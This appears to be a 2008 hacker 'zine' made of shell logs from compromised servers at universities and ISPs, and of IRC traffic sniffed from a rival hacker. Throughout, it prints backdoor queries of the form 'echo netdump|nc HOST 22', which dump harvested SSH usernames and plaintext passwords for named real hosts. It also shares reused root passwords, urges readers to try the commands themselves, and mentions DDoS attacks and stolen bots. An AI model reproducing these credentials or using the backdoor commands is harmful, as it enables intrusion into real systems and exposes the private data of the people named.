## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux users 2.6.23-gentoo i686 ****
root () users:~#
root () users:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux users 2.6.23-gentoo #4 SMP PREEMPT Fri Dec 14 19:43:35 EET 2007 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel
GNU/Linux
10:49:08 up 171 days, 22:37, 1 user, load average: 0.20, 0.24, 0.21
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 10:46 0.00s 0.44s 0.00s w
inet addr:192.168.253.3 Bcast:192.168.253.255 Mask:255.255.255.0
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
inet addr:169.254.78.132 Bcast:169.254.255.255 Mask:255.255.0.0
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
inet addr:212.111.196.163 Bcast:212.111.196.191 Mask:255.255.255.224
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
inet addr:212.26.143.6 Bcast:212.26.143.7 Mask:255.255.255.252
inet6 addr: fe80::204:23ff:febb:d710/64 Scope:Link
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 212.143.216.226 22
Trying 212.143.216.226...
Connected to 212.143.216.226.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> im getting
tired of this.
pam_from: 62.219.238.196 user: root pass: QWERFcxz (mail2.tikalnetworks.com) ----->>>>>>>> no kidding.
central () labsec [~xoxox/h3h3] # ssh root () 212 143 216 226
root () 212 143 216 226's password:
jessica temp # uname -a;w;/sbin/ifconfig -a|grep inet
Linux jessica 2.6.17-gentoo-r7 #3 Sun Sep 3 11:17:41 IDT 2006 i686 Intel(R) Celeron(R) CPU 2.66GHz GenuineIntel
GNU/Linux
09:58:11 up 3 days, 18:03, 1 user, load average: 1.29, 1.16, 1.08
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 09:34 16:19 0.32s 0.30s ssh 10.0.0.3
inet addr:10.0.0.253 Bcast:10.0.0.255 Mask:255.255.255.0
inet addr:127.0.0.1 Mask:255.0.0.0
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep OUT
SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br)
SSH2_OUT: 143.107.133.233 user: pdborges pass: mipa0529 (aegir.if.usp.br)
SSH2_OUT: 143.106.42.243 user: luana pass: 103174b (athenas.cna.unicamp.br)
SSH2_OUT: 143.107.133.8 user: kpp pass: fth6mdy (landauer.if.usp.br)
SSH2_OUT: 143.107.133.47 user: luana pass: 103174b (schroedinger.if.usp.br)
SSH2_OUT: 143.107.133.76 user: mvarella pass: CH3Ftri (planck.if.usp.br)
SSH2_OUT: 143.107.133.38 user: wlscopel pass: va1513zb (feynman.if.usp.br)
SSH2_OUT: 143.107.133.47 user: cedric pass: KunD1cka (schroedinger.if.usp.br)
central () labsec [~xoxox/h3h3] # echo netdump|nc 143.107.133.103 22|grep from|grep -v bullshit
pass_from: 143.107.133.244 user: hmf18 pass: xpx9b15+ (turista.if.usp.br)
pass_from: 201.52.218.156 user: cedric pass: P1chona04 (c934da9c.virtua.com.br)
pass_from: 201.82.105.213 user: mfsoares pass: 3p1t () xy (c95269d5.virtua.com.br)
pass_from: 189.34.88.209 user: kpp pass: mdc6gpt (bd2258d1.virtua.com.br)
pass_from: 189.102.19.167 user: pontes pass: r () s&09* (bd6613a7.virtua.com.br)
pass_from: 189.102.98.126 user: lassali pass: las2008ro (bd66627e.virtua.com.br)
central () labsec [~xoxox/h3h3] # ssh root () 143 107 133 103 'uname -a'
root () 143 107 133 103's password:
Linux romeo 2.6.5-7.286-smp #1 SMP Thu May 31 10:12:58 UTC 2007 x86_64 x86_64 x86_64 GNU/Linux
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 200.144.186.37 22
Trying 200.144.186.37...
Connected to shark.lcca.usp.br (200.144.186.37).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> k from now
on, no more netdump messages
SSH2_OUT: 127.0.0.1 user: root pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> just got
tired, u knoW
SSH2_OUT: 127.0.0.1 user: amazonas pass: UspNNNNd (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> anyway im
almost stopping pasting stuff
-> alot of kool shit regarding usp.br here
try yourself-> echo netdump|nc 200.144.186.37 22|grep usp.br
or just grep OUT
kthxnpurwelcome
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep localhost
SSH2_OUT: 127.0.0.1 user: root pass: ArmY1*00 (localhost) ->>>>>>>>>>>>>>>>> im glad you are here :)
kind of makes it easy
central () labsec [~xoxox/h3h3] # ssh root () 200 145 203 74
root () 200 145 203 74's password:
Last login: Thu Jul 31 09:30:33 2008 from nemo.df.ibilce.unesp.br
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux hobbes 2.6.18-6-686 i686 ****
root () hobbes:~#
root () hobbes:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux hobbes 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
05:47:44 up 27 days, 15:12, 1 user, load average: 0.21, 0.15, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
rico :0 - 06Aug08 ?xdm? 5:39 0.71s x-session-manager
inet addr:200.145.203.74 Bcast:200.145.203.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:7dff:fed7:f778/64 Scope:Link
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
root () hobbes:~#
central () labsec [~xoxox/h3h3] # echo netdump|nc 200.145.203.74 22|grep unesp
pass_from: 200.145.203.42 user: rico pass: so31fia12 (nemo.df.ibilce.unesp.br)
SSH2_OUT: 200.145.203.42 user: ronaldo pass: LANmu80 (nemo.df.ibilce.unesp.br)
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # telnet 67.15.56.12 22
Trying 67.15.56.12...
Connected to 67.15.56.12.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.9
netdump
SSH2_OUT: 127.0.0.1 user: root pass: l3nny1nt3l (localhost)
SSH2_OUT: 127.0.0.1 user: lenny pass: l3nny1nt3l (localhost)
pass_from: 76.188.180.141 user: joe pass: 1207j0s3ph7ys0n9813 (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141 user: devel pass: ha1W0;rlD.0121 (cpe-76-188-180-141.neo.res.rr.com)
pass_from: 76.188.180.141 user: celtrust pass: 1207j0s3ph9813 (cpe-76-188-180-141.neo.res.rr.com)
central () labsec [~xoxox/h3h3] # ssh root () 67 15 56 12
root () 67 15 56 12's password:
Last login: Tue Aug 12 00:51:58 2008 from c-98-234-65-222.hsd1.ca.comcast.net
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux f1.celtrust.com 2.6.9-34.ELsmp i686 ****
[root[ () f1 ~]#
[root[ () f1 ~]# uname -a;w;/sbin/ifconfig -a|grep inet
Linux f1.celtrust.com 2.6.9-34.ELsmp #1 SMP Fri Feb 24 16:54:53 EST 2006 i686 i686 i386 GNU/Linux
05:20:15 up 153 days, 9:30, 0 users, load average: 2.62, 1.27, 0.63
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
inet addr:67.15.56.12 Bcast:67.15.57.255 Mask:255.255.254.0
inet6 addr: fe80::211:11ff:fe67:a66b/64 Scope:Link
inet addr:67.15.57.240 Bcast:67.15.57.255 Mask:255.255.255.0
inet addr:67.15.57.241 Bcast:67.15.57.255 Mask:255.255.255.0
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # ssh root () 66 119 174 19
root () 66 119 174 19's password:
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux res1.van.metrobridge.net 2.6.18-5-686 i686 ****
root () res1:~#
root () res1:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux res1.van.metrobridge.net 2.6.18-5-686 #1 SMP Fri Jun 1 00:47:00 UTC 2007 i686 GNU/Linux
12:54:34 up 315 days, 17:40, 4 users, load average: 0.58, 0.35, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sky pts/0 66.119.176.2 11:41 1:12 0.00s 0.00s -bash
sky pts/3 66.119.176.2 Tue15 20:53 0.18s 0.00s sshd: sky [priv]
sky pts/6 66.119.176.2 11:42 1:10 0.16s 0.01s sshd: sky [priv]
vee pts/7 74.221.143.3 12:23 28:41m 0.07s 0.00s telnet seton-3550
inet addr:66.119.174.4 Bcast:66.119.174.15 Mask:255.255.255.240
inet6 addr: fe80::219:b9ff:fee1:c808/64 Scope:Link
inet addr:66.119.174.29 Bcast:66.119.174.31 Mask:255.255.255.240
inet addr:65.39.152.235 Bcast:65.39.152.255 Mask:255.255.255.224
inet addr:65.39.152.237 Bcast:65.39.152.255 Mask:255.255.255.224
inet addr:66.119.174.19 Bcast:66.119.174.31 Mask:255.255.255.240
inet addr:65.39.152.239 Bcast:65.39.152.255 Mask:255.255.255.224
inet addr:66.119.174.3 Bcast:66.119.174.15 Mask:255.255.255.240
inet addr:66.119.174.2 Bcast:66.119.174.15 Mask:255.255.255.240
pass_from: 66.119.176.2 user: simon pass: pass77 (mail.metrobridge.com) [whole metrobridge with
the same pass]
pass_from: 66.119.176.2 user: sky pass: rotoFro7 (mail.metrobridge.com) [whole metrobridge with
the same pass]
have fun
- what a shame.. again, metrobridge ? i told you to keep on eye on your sshd since your zine :(
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # ssh root () 200 239 200 102
root () 200 239 200 102's password:
Last login: Mon Aug 11 09:09:40 2008 from stml030.microlink.com.br
Linux 2.6.11.12-ul1.
**** Connected to ****
### # ### ## ### ## ### ### ###### ######
## # ## # ## ## ## # ## # # ## #
#### ### #### ### # #### ##
### #### ## ##### ## ##
# ## ## ## ## ## ## ## ## ##
#### #### ## #### ### ## ###### #### 1.0
**** Linux proxy2-rj 2.6.11.12-ul1 i686 ****
root () proxy2-rj:~#
root () proxy2-rj:~# uname -a;hostname -f;w
Linux proxy2-rj 2.6.11.12-ul1 #1 Tue Aug 30 12:40:56 BRT 2005 i686 unknown
proxy2-rj.pop-rio.com.br
17:14:22 up 97 days, 5:09, 0 users, load average: 2.16, 1.88, 1.76
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root () proxy2-rj:~#
root () proxy2-rj:~# ./sshread mac.h|grep 200\.239|sort|uniq
pass_from: 200.239.245.50 user: root pass: Beth01@ (gwpr03.microlink.com.br)
pass_from: 200.239.245.70 user: root pass: pa$$w0rd (Froes.microlink.com.br)
root () proxy2-rj:~# ./sshread mac.h|grep OUT
SSH2_OUT: 127.0.0.1 user: root pass: BuCaaAadd (localhost) -----> /me laughs
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
central () labsec [~xoxox/h3h3] # ssh root () 143 107 250 214
root () 143 107 250 214's password:
Last login: Fri Jun 13 14:58:50 2008 from 143-107-55-100.iq.usp.br
..... !! HELLO WORLD !! .....
@@@@@@ @@@@@@
@@ @@ @@ @@
@@ @@ @@ @@@ @@ @@ @@ @@@ @@ @@
@@ @@ @@ @ @@ @@ @@ @@ @ @@ @@ @@
IIII II I II IIII II I II IIII
IIII III II IIII III II IIII
II II II II II II II II II II
II II IIIIII II II IIIIII II II
**** Linux noelrosa.iq.usp.br 2.6.9-42.0.10.EL x86_64 **** ->>>> new kool motd, n1cE rIpZ
[root[ () noelrosa ~]#
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< s0RrY bUT We g0T tiReD oF pAstIng StUfF lIkE thAT
-;;;;;;; i think thats enough to paste, right ?
-;;;;;; anyway, in the end/bottom of this 'zine' there is a file to download with some of the ip's that weve got
from them
-/-/-/-/-/-/-/-/-/-/ lEtz havE fuN WiTH r47's BnC rigHT noW -/-/-/-/-/-/-/-/-/-/
r47 is r47 () bl4ckh47 org * i own u! [and We own you!]
r47 on @#combat #osiris @#/<-rad
r47 using irc.ipv6.he.net Hurricane Electric IPV6 IRC Server
r47 actually using host 2001:470:1f15:42b::3
r47 End of /WHOIS list.
central () labsec [~xoxox/h3h3] # ssh root () bl4ckh47 org -p 2222 bash
root () bl4ckh47 org's password: .niklincith08. (same pass goes for all casablanca.cz/eurosignal.cz)
uname -a;w;hostname -f
Linux VoIP-Mnisek 2.6.18-3-k7-pj #2 Tue Feb 27 18:30:13 CET 2007 i686 GNU/Linux
10:13:26 up 162 days, 8:25, 0 users, load average: 0.04, 0.05, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
VoIP.eurosignal.cz
sit0 Link encap:IPv6-in-IPv4
inet6 addr: ::10.0.2.254/96 Scope:Compat
inet6 addr: ::127.0.0.1/96 Scope:Unknown
inet6 addr: ::10.0.2.4/96 Scope:Compat
inet6 addr: ::77.78.84.242/96 Scope:Compat
UP RUNNING NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
sit1 Link encap:IPv6-in-IPv4
inet6 addr: 2001:470:1f15:42b::2/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::3/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::4/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::5/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::6/64 Scope:Global
inet6 addr: 2001:470:1f15:42b::7/64 Scope:Global
inet6 addr: fe80::a00:2fe/64 Scope:Link
inet6 addr: fe80::a00:204/64 Scope:Link
inet6 addr: fe80::4d4e:54f2/64 Scope:Link
UP POINTOPOINT RUNNING NOARP MTU:1480 Metric:1
RX packets:16700 errors:0 dropped:0 overruns:0 frame:0
TX packets:9917 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1677861 (1.6 MiB) TX bytes:982003 (958.9 KiB)
tcp 0 0 77.48.84.242:65535 189.4.189.139:61593 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:51338 2001:41e0:5::6667:6667 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:49197 2001:470:0:6667::2:6667 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:48159 2001:40a8:3000:1:0:6667 ESTABLISHED
tcp6 0 0 2001:470:1f15:42b:51411 2001:40a8:3000:1:0:6667 ESTABLISHED
perl 12655 root 4u IPv4 3027913 TCP *:65535 (LISTEN)
root 12655 0.0 0.3 5256 3220 ? S Mar19 2:39 supervise log
- nice process name btw
- lets start the sniffer, shall we? - btw im using the ircsniff.pl you stole from efnet's box, thanks -
<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :u know d0n
<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :he took my nick
<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :he's packeting me
<- :d0n_!burnout () burnout bitchx org PRIVMSG r47 :;\
-> PRIVMSG d0n_ :d0n No such nick/channel
-> PRIVMSG d0n_ :d0n End of /WHOIS list.
-> PRIVMSG d0n_ :change
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :lamer :(
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :owns my dsl
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :real leet
-> PRIVMSG d0n :who ?
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :that d0n guy
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :had my nick
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :was talking shit
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :"here comes the ddos" he said
-> PRIVMSG d0n :fuck
-> PRIVMSG d0n :lets hack him
-> PRIVMSG d0n :not hard target
-> PRIVMSG d0n :hehehe
-> PRIVMSG d0n :to me
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :HHEHEHEEH\
-> PRIVMSG d0n ::>:>:>:>
-> PRIVMSG d0n :sup bitchx
-> PRIVMSG d0n ::>
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 ::)
-> PRIVMSG d0n :bitchx bugged
-> PRIVMSG d0n :do u use it ?
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :the client?
-> PRIVMSG d0n :yah
-> PRIVMSG d0n :0dayz
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :no shit..
-> PRIVMSG d0n :eheh
*********************** run to the hillz he h4s b1tchx 0d4y **********************
-> PRIVMSG d0n :i have windows on linux (vmware) ->>>>>>>>>>>>>>>>>>>>> lies
-> PRIVMSG d0n :hjmm
-> PRIVMSG d0n :;>
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :ah yeah
-> PRIVMSG d0n :omfg
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :any more fun with efnet soon?
-> PRIVMSG d0n :im still drunked
-> PRIVMSG d0n :no more
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :HEHE
-> PRIVMSG d0n :im stoped with x0x0x
<- :d0n!burnout () burnout bitchx org PRIVMSG r47 :;p
-> PRIVMSG d0n :just sniffing idiots now ->>>>>>>>>>>>>>>>>>>> so we are
*********************** /laugh time ********************************************
-> PRIVMSG accuser :nem
-> PRIVMSG accuser :nao me comunico mais com povo br ->>>>>>>>>>>>>>>>>>>>
-> PRIVMSG accuser :nao eh meu nivel
-> PRIVMSG accuser :so alguns amigos
-> PRIVMSG accuser :nego roubo meu canal ontem ->>>>>>>>>>>>>>>>>>>> some guyz stole
my network baby
-> PRIVMSG accuser :recuperei
-> PRIVMSG accuser :e tomei o nick deles ->>>>>>>>>>>>>>>>>>>> i ddosed them and
got their nicks
-> PRIVMSG accuser :/w psys
-> PRIVMSG accuser :/w dtr
-> PRIVMSG accuser :hehehe ->>>>>>>>>>>>>>>>>>>> now i feel gr8
<- :accuser!~psy () 64 244 62 214 PRIVMSG r47 :eu vi
<- :accuser!~psy () 64 244 62 214 PRIVMSG r47 :o psys tacando monte de bot
-> PRIVMSG accuser :comigo eh dificil um br poder ->>>>>>>>>>>>>>>>>>>>
HAHAHAHAHAHAHAHAAHHAHAHAHAHAHAHAHA (12x)
-> PRIVMSG accuser :hehehe
-> PRIVMSG accuser :eu mando! ->>>>>>>>>>>>>>>>>>>> im THE guy!
-> PRIVMSG accuser :eu to mo fora de guerra cara
-> PRIVMSG accuser :mas parece q os caras me perseguem
-> PRIVMSG accuser :e sismam q sou lamer ->>>>>>>>>>>>>>>>>>>> /me laughs
-> PRIVMSG accuser :rs
-> PRIVMSG sexybaby :itsme q_+T*/81_3|Z3g; r47 ->>>>>>>>>>>>>>>>>>>> hiz botz, thanks
for sharing
-> PRIVMSG sexybaby :op q_+T*/81_3|Z3g;
sexybaby on @#brasil @+#Sonya @#24/7 @+#prank @#unforgiven @#serious @#xanax ->>>>>>>>>>>>>>>>>>>> 3h3h3h3
<- :KoaL4!h () 216 75 56 186 PRIVMSG r47 :c vai me ajeita un trem que presta entum? ->>>>>>>>>>>>>>>>> gimm3 a b0x
-> PRIVMSG KoaL4 :cara
-> PRIVMSG KoaL4 :vou
-> PRIVMSG KoaL4 :mas nao me atrapalha
-> PRIVMSG KoaL4 :to aki programando
-> PRIVMSG KoaL4 :pra um cliente chato pra kct
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :ta
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :arrumando truta
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :com os cara da defland pq
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :falaram meu nome em vao
-> PRIVMSG \g4br13l\ :nao qro isso
-> PRIVMSG \g4br13l\ :so isso
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :r47
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :tu se esquenta
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :com bobagem
-> PRIVMSG \g4br13l\ :hehee
<- :\g4br13l\!~ucvn () server3 erz univie ac at PRIVMSG r47 :?
-> PRIVMSG \g4br13l\ :nao qro pivete
-> PRIVMSG \g4br13l\ :de merda
-> PRIVMSG \g4br13l\ :kiddie
-> PRIVMSG \g4br13l\ :falando de mim
-> PRIVMSG \g4br13l\ :pq qm manda ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ :sou eu ----->>>>>>>>>>>>> HAHAHAHAHAHAHAHAHAHAHAHA
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :esse univie.ac.at eh show
-> PRIVMSG \g4br13l\ :tenho a www la
-> PRIVMSG \g4br13l\ ::>
-> PRIVMSG \g4br13l\ :usam checkpoint firewall one ----->>>>>>>>>>>>> what the fuck ?
-> PRIVMSG \g4br13l\ :tunnelling by trace ----->>>>>>>>>>>>> ?!?1
-> PRIVMSG \g4br13l\ :mto dificil pacota-la
*********************** boyfriends are fighting - portuguese only, sorry **********************
-> PRIVMSG #thc :skotch is gay
-> PRIVMSG skotch :eai vagabunda
-> PRIVMSG skotch :vai fica na putaria ateh qdo
-> PRIVMSG skotch :to cheio de novidades
-> PRIVMSG skotch :e para de me chamar de verme
-> PRIVMSG skotch :rs
<- ::skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :vai toma no meu do teu cuh rapa, n qro papo contigo e ve
se para de fica mandando alerta no meu nextel -> gtfo
-> PRIVMSG skotch :ahahaha
-> PRIVMSG skotch :vc tem certeza ->>>>>>>>> are you sure baby ?
-> PRIVMSG skotch :entao eh isso ?
-> PRIVMSG skotch :ja era ?:
-> PRIVMSG skotch :ja era ?
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :sim
-> PRIVMSG skotch :eu nao vou voltar aki denovo
-> PRIVMSG skotch :pra falar com vc
-> PRIVMSG skotch :ja era ?
-> PRIVMSG skotch :CERTEZA? ->>>>>>>> are you sure we are breaking
apart?????
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :alias quem ta oltando aki direto eh vc, eu to na minha
faz tempo
-> PRIVMSG skotch :to na minha tb
-> PRIVMSG skotch :so acho
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :vc fala merda e dps quer voltar a tras
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :coisa de mlk
-> PRIVMSG skotch :filho
-> PRIVMSG skotch :eu so acho
-> PRIVMSG skotch :q eh besteira
-> PRIVMSG skotch :agente brigasr por isso
-> PRIVMSG skotch :so isso
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :mermao n eh a primeira vez
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q tu da dessas
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :vem falando bosta
:skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :e dps vem se desculpando
-> PRIVMSG skotch :so joguei um verde
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :n so esses verme de merda
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q paga pau pra vc
-> PRIVMSG skotch :nao vou fazer isso denovo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :q aceita tudo q vc fala
-> PRIVMSG skotch :whatever
-> PRIVMSG skotch :nao falei q tu paga sapo pra mim
-> PRIVMSG skotch :tu tb
-> PRIVMSG skotch :eh cheio das noia q nem eu
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :tu soh mostro q n confia
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :axando q eu passo maq pra xscholler
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :aff
-> PRIVMSG skotch :porra
-> PRIVMSG skotch :tu some
-> PRIVMSG skotch :so joguei um verde
-> PRIVMSG skotch :se nao confiasse
-> PRIVMSG skotch :tu nao tinha
-> PRIVMSG skotch :tds minhas box
-> PRIVMSG skotch :TODAS
-> PRIVMSG skotch :fdp
-> PRIVMSG skotch :outra coisa
-> PRIVMSG skotch :descobri
-> PRIVMSG skotch :o klux
-> PRIVMSG skotch :tem root na importec ->>>>>> klux has root in importec[their box] (you are
right sir!)
-> PRIVMSG skotch :NAO USA MAIS ELA DE PONTE ->>>>>> dont use it as bounce anymore! (kinda late)
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :n vem dessas q qdo mandei o skotch.txt tinha mta maq la q
vc nem tinha ownado, q eu tinha ownado sozinho
-> PRIVMSG skotch :e varias box.. ele so troca o ssh binario
-> PRIVMSG skotch :pra sniffa
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :n to usando mais importec faz tempo
-> PRIVMSG skotch :fica ligeiro
-> PRIVMSG skotch :eu formatei ele
-> PRIVMSG skotch :deproposito
-> PRIVMSG skotch :ele veio no meu pvt
-> PRIVMSG skotch :colo uma pa de merda
-> PRIVMSG skotch :ele sabe da ig
-> PRIVMSG skotch :da locaweb
-> PRIVMSG skotch :da pop
-> PRIVMSG skotch :<skotch> n vem dessas q qdo mandei o skotch.txt tinha mta maq la q vc nem tinha ownado, q eu tinha
ownado sozinho
-> PRIVMSG skotch :e vice versa
-> PRIVMSG skotch :q seja
-> PRIVMSG skotch :ouytra coisa
-> PRIVMSG skotch :peguei coisa quente
-> PRIVMSG skotch :sshd
-> PRIVMSG skotch :hehehe
-> PRIVMSG skotch :remote expl
-> PRIVMSG skotch :openbsd local ->>>>>>>>>> y0y0 juz g0t a openbsd local (right, check it on
milw0rm, asshole)
-> PRIVMSG skotch :tu fica de putaria
-> PRIVMSG skotch :agente perdendo tempo
<- :skotch!~skotch () d0nt bl4m3 4 l33tzor org PRIVMSG r47 :o openbsd vc a mando faz tempo
-> PRIVMSG skotch :mas esse novo nao
-> PRIVMSG skotch :entra na merda do msn
-> PRIVMSG skotch :e para de putaria
-> PRIVMSG skotch :por besteira
